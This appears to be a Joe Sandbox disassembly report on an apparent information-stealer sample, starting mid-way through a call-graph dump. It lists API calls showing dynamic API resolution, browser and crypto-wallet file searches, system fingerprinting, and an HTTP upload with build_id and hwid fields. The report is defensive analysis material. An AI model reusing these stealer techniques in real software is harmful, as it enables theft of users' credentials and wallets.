60288->60287 60289 40feb0 2 API calls 60288->60289 60289->60288 60940 4100c0 60290->60940 60292 411fdf strtok_s 60293 411ff0 60292->60293 60294 41210d 60292->60294 60295 4120f2 strtok_s 60293->60295 60296 4120c4 StrCmpCA 
60293->60296 60297 412026 StrCmpCA 60293->60297 60298 412098 StrCmpCA 60293->60298 60299 41206c StrCmpCA 60293->60299 60300 40feb0 lstrlen lstrcpy 60293->60300 60294->59085 60295->60293 60295->60294 60296->60293 60297->60293 60298->60293 60299->60293 60300->60293 60302 40fe20 lstrcpy 60301->60302 60303 415693 60302->60303 60304 40ffe0 3 API calls 60303->60304 60305 4156a9 60304->60305 60306 40ff00 lstrcpy 60305->60306 60307 4156b6 60306->60307 60941 402420 60307->60941 60310 40ff50 2 API calls 60311 4156de 60310->60311 60312 40ff00 lstrcpy 60311->60312 60313 4156eb 60312->60313 60314 40ffe0 3 API calls 60313->60314 60315 415713 60314->60315 60316 40ff00 lstrcpy 60315->60316 60317 415720 60316->60317 60318 40ffe0 3 API calls 60317->60318 60319 41573c 60318->60319 60320 40ff00 lstrcpy 60319->60320 60321 415749 60320->60321 60322 40ffe0 3 API calls 60321->60322 60323 415765 60322->60323 60324 40ff00 lstrcpy 60323->60324 60325 415772 60324->60325 60944 4102a0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 60325->60944 60327 415782 60328 40ffe0 3 API calls 60327->60328 60329 41578f 60328->60329 60330 40ff00 lstrcpy 60329->60330 60331 41579c 60330->60331 60332 40ffe0 3 API calls 60331->60332 60333 4157b8 60332->60333 60334 40ff00 lstrcpy 60333->60334 60335 4157c5 60334->60335 60336 40ffe0 3 API calls 60335->60336 60337 4157e1 60336->60337 60338 40ff00 lstrcpy 60337->60338 60339 4157ee 60338->60339 60945 410c30 memset RegOpenKeyExA 60339->60945 60341 4157fe 60342 40ffe0 3 API calls 60341->60342 60343 41580b 60342->60343 60344 40ff00 lstrcpy 60343->60344 60345 415818 60344->60345 60346 40ffe0 3 API calls 60345->60346 60347 415834 60346->60347 60348 40ff00 lstrcpy 60347->60348 60349 415841 60348->60349 60350 40ffe0 3 API calls 60349->60350 60351 41585d 60350->60351 60352 40ff00 lstrcpy 60351->60352 60353 41586a 60352->60353 60354 410cd0 2 API calls 60353->60354 60355 41587e 60354->60355 60356 40ff50 2 API calls 60355->60356 60357 415892 60356->60357 60358 40ff00 lstrcpy 
60357->60358 60359 41589f 60358->60359 60360 40ffe0 3 API calls 60359->60360 60361 4158c7 60360->60361 60362 40ff00 lstrcpy 60361->60362 60363 4158d4 60362->60363 60364 40ffe0 3 API calls 60363->60364 60365 4158f0 60364->60365 60366 40ff00 lstrcpy 60365->60366 60367 4158fd 60366->60367 60368 410d30 12 API calls 60367->60368 60369 415911 60368->60369 60370 40ff50 2 API calls 60369->60370 60371 415925 60370->60371 60372 40ff00 lstrcpy 60371->60372 60373 415932 60372->60373 60374 40ffe0 3 API calls 60373->60374 60375 41595a 60374->60375 60376 40ff00 lstrcpy 60375->60376 60377 415967 60376->60377 60378 40ffe0 3 API calls 60377->60378 60379 415983 60378->60379 60380 40ff00 lstrcpy 60379->60380 60381 415990 60380->60381 60382 41599b GetCurrentProcessId 60381->60382 60949 4119c0 OpenProcess 60382->60949 60385 40ff50 2 API calls 60386 4159bf 60385->60386 60387 40ff00 lstrcpy 60386->60387 60388 4159cc 60387->60388 60389 40ffe0 3 API calls 60388->60389 60390 4159f4 60389->60390 60391 40ff00 lstrcpy 60390->60391 60392 415a01 60391->60392 60393 40ffe0 3 API calls 60392->60393 60394 415a1d 60393->60394 60395 40ff00 lstrcpy 60394->60395 60396 415a2a 60395->60396 60397 40ffe0 3 API calls 60396->60397 60398 415a46 60397->60398 60399 40ff00 lstrcpy 60398->60399 60400 415a53 60399->60400 60401 40ffe0 3 API calls 60400->60401 60402 415a6f 60401->60402 60403 40ff00 lstrcpy 60402->60403 60404 415a7c 60403->60404 60954 410ee0 GetProcessHeap HeapAlloc 60404->60954 60406 415a8c 60407 40ffe0 3 API calls 60406->60407 60408 415a99 60407->60408 60409 40ff00 lstrcpy 60408->60409 60410 415aa6 60409->60410 60411 40ffe0 3 API calls 60410->60411 60412 415ac2 60411->60412 60413 40ff00 lstrcpy 60412->60413 60414 415acf 60413->60414 60415 40ffe0 3 API calls 60414->60415 60416 415aeb 60415->60416 60417 40ff00 lstrcpy 60416->60417 60418 415af8 60417->60418 60961 411020 CoInitializeEx CoInitializeSecurity CoCreateInstance 60418->60961 60420 415b0c 60421 40ff50 2 API calls 60420->60421 60422 415b20 
60421->60422 60423 40ff00 lstrcpy 60422->60423 60424 415b2d 60423->60424 60425 40ffe0 3 API calls 60424->60425 60426 415b55 60425->60426 60427 40ff00 lstrcpy 60426->60427 60428 415b62 60427->60428 60429 40ffe0 3 API calls 60428->60429 60430 415b7e 60429->60430 60431 40ff00 lstrcpy 60430->60431 60432 415b8b 60431->60432 60975 4111e0 CoInitializeEx CoInitializeSecurity CoCreateInstance 60432->60975 60434 415b9f 60435 40ff50 2 API calls 60434->60435 60436 415bb3 60435->60436 60437 40ff00 lstrcpy 60436->60437 60438 415bc0 60437->60438 60439 40ffe0 3 API calls 60438->60439 60440 415be8 60439->60440 60441 40ff00 lstrcpy 60440->60441 60442 415bf5 60441->60442 60443 40ffe0 3 API calls 60442->60443 60444 415c11 60443->60444 60445 40ff00 lstrcpy 60444->60445 60446 415c1e 60445->60446 60447 410260 3 API calls 60446->60447 60448 415c2e 60447->60448 60449 40ffe0 3 API calls 60448->60449 60450 415c3b 60449->60450 60451 40ff00 lstrcpy 60450->60451 60452 415c48 60451->60452 60453 40ffe0 3 API calls 60452->60453 60454 415c64 60453->60454 60455 40ff00 lstrcpy 60454->60455 60456 415c71 60455->60456 60457 40ffe0 3 API calls 60456->60457 60458 415c8d 60457->60458 60459 40ff00 lstrcpy 60458->60459 60460 415c9a 60459->60460 60989 410220 GetProcessHeap HeapAlloc GetUserNameA 60460->60989 60462 415caa 60463 40ffe0 3 API calls 60462->60463 60464 415cb7 60463->60464 60465 40ff00 lstrcpy 60464->60465 60466 415cc4 60465->60466 60467 40ffe0 3 API calls 60466->60467 60468 415ce0 60467->60468 60469 40ff00 lstrcpy 60468->60469 60470 415ced 60469->60470 60471 40ffe0 3 API calls 60470->60471 60472 415d09 60471->60472 60473 40ff00 lstrcpy 60472->60473 60474 415d16 60473->60474 60990 410bb0 7 API calls 60474->60990 60477 40ff50 2 API calls 60478 415d3e 60477->60478 60479 40ff00 lstrcpy 60478->60479 60480 415d4b 60479->60480 60481 40ffe0 3 API calls 60480->60481 60482 415d73 60481->60482 60483 40ff00 lstrcpy 60482->60483 60484 415d80 60483->60484 60485 40ffe0 3 API calls 60484->60485 60486 415d9c 

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 559 4185a0-4185b2 LoadLibraryA 560 4187c7-418826 LoadLibraryA * 5 559->560 561 4185b8-4187c2 GetProcAddress * 21 559->561 562 418828-418836 GetProcAddress 560->562 563 41883b-418842 560->563 561->560 562->563 565 418844-41886a GetProcAddress * 2 563->565 566 41886f-418876 563->566 565->566 567 418878-418886 GetProcAddress 566->567 568 41888b-418892 566->568 567->568 569 418894-4188a2 GetProcAddress 568->569 570 4188a7-4188ae 568->570 569->570 571 4188b0-4188d5 GetProcAddress * 2 570->571 572 4188da 570->572 571->572
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,004184AA), ref: 004185A5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,0155F258), ref: 004185C0
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F1C8), ref: 004185ED
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F2E8), ref: 00418606
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F3C0), ref: 0041861E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F3A8), ref: 00418636
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562EB0), ref: 0041864F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,015625C0), ref: 00418667
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562800), ref: 0041867F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F360), ref: 00418698
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F300), ref: 004186B0
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F438), ref: 004186C8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F240), ref: 004186E1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,015627E0), ref: 004186F9
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F3F0), ref: 00418711
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F318), ref: 0041872A
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562640), ref: 00418742
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F330), ref: 0041875A
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155F348), ref: 00418773
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562680), ref: 0041878B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0155CA58), ref: 004187A3
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562600), ref: 004187BC
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DCD8), ref: 004187CD
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DD50), ref: 004187DF
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DB10), ref: 004187F1
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DAC8), ref: 00418802
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0156DB88), ref: 00418814
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,0156DBB8), ref: 00418830
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0156DC18), ref: 0041884C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0156DC30), ref: 00418864
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0156DC60), ref: 00418880
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,01562660), ref: 0041889C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76E90000,01562EC0), ref: 004188B8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004188CF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: NtQueryInformationProcess$kernel32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-258108907
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7266dee1e8cedc60a2977318b2278b4377f0c83288a22ad4706934660cf6d17d
                                                                                                                                                                                                                                                                                                  • Instruction ID: bda799d21cc2b01bfb12709a94fee26cd9c3543f1087e7d92f23403565ae61c8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7266dee1e8cedc60a2977318b2278b4377f0c83288a22ad4706934660cf6d17d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 199144BDA00620EFE754DFA4ED48A2637BBF74AB01B146529EA05C7374E774A841CB60
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

[Control-flow graph for the function at 4164a0 (rendered graph not recoverable). Named API calls in the graph: wsprintfA, FindFirstFileA, memset, StrCmpCA, FindNextFileA, FindClose, lstrcat, strtok_s, PathMatchSpecA. The function also calls itself (call 4164a0).]
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                                                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 1425701045-3225784412
                                                                                                                                                                                                                                                                                                  • Opcode ID: f9a939fed25fb007d3cd6773e4f62d57578648204a3180eca1f04e510bea48cb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 90e794690816a6f02978cdac63616847133c7af68286edecf0343b1f7787fe60
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9a939fed25fb007d3cd6773e4f62d57578648204a3180eca1f04e510bea48cb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78C1FDB5900218ABDF10DFA4DC85EEE7779EF48704F10455EF515A3281E738AE88CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

[Control-flow graph for the function at 40d320 (rendered graph not recoverable). Named API calls in the graph: FindFirstFileA, StrCmpCA, FindNextFileA, FindClose, CopyFileA, DeleteFileA. The function also calls itself (call 40d320).]
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00426A8A,00426A87,00000000,?,00426BC8,?,?,00426A86,?,00000000,00000005), ref: 0040D3D4
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426BCC), ref: 0040D43C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426BD0), ref: 0040D456
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426BD4,?,?,00426A8B), ref: 0040D504
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Brave$E$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences$p@$p@E
                                                                                                                                                                                                                                                                                                  • API String ID: 2567437900-2467990661
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045CA
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 004045EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404774
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0156F8F8,?,015724D8,00000000,00000000,-00400100,00000000), ref: 004047B5
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004047DB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,0041FDC9,?,?,?,00426885,00000000,0041FDC9,?,00000000,0041FDC9,",00000000,0041FDC9,build_id), ref: 00404AAA
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404AC3
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD4
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404AEB
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404B3F
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B4A
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404B5F
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B69
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                                                                                                                  • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                                                                  • API String ID: 1585128682-3346224549
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C87F688,00001000), ref: 6C7F35D5
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7F35E0
                                                                                                                                                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6C7F35FD
                                                                                                                                                                                                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7F363F
                                                                                                                                                                                                                                                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7F369F
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C7F36E4
                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C7F3773
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C7F377E
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C7F37BD
                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C7F37C4
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C7F37CB
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C7F3801
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C7F3883
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C7F3902
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C7F3918
                                                                                                                                                                                                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C7F394C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                                                                                  • API String ID: 301339242-3790311718
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                                                  • API String ID: 3088078853-445461498
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC,00000000), ref: 00411043
                                                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4), ref: 00411054
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000), ref: 0041106E
                                                                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(004273DC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000), ref: 004110A7
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00411106
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: CoCreateInstance.OLE32(00427AB4,00000000,00000001,00427260,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?), ref: 00410F8D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: SysAllocString.OLEAUT32(?), ref: 00410F9C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: _wtoi64.MSVCRT ref: 00410FE2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: SysFreeString.OLEAUT32(?), ref: 00410FF8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: SysFreeString.OLEAUT32(00000000), ref: 00410FFB
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(004273F4,?,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 00411140
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 0041114C
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC), ref: 00411153
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00411197
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041117F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                                                  • API String ID: 1611285705-2016369993
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00411D4B
                                                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00411DCA
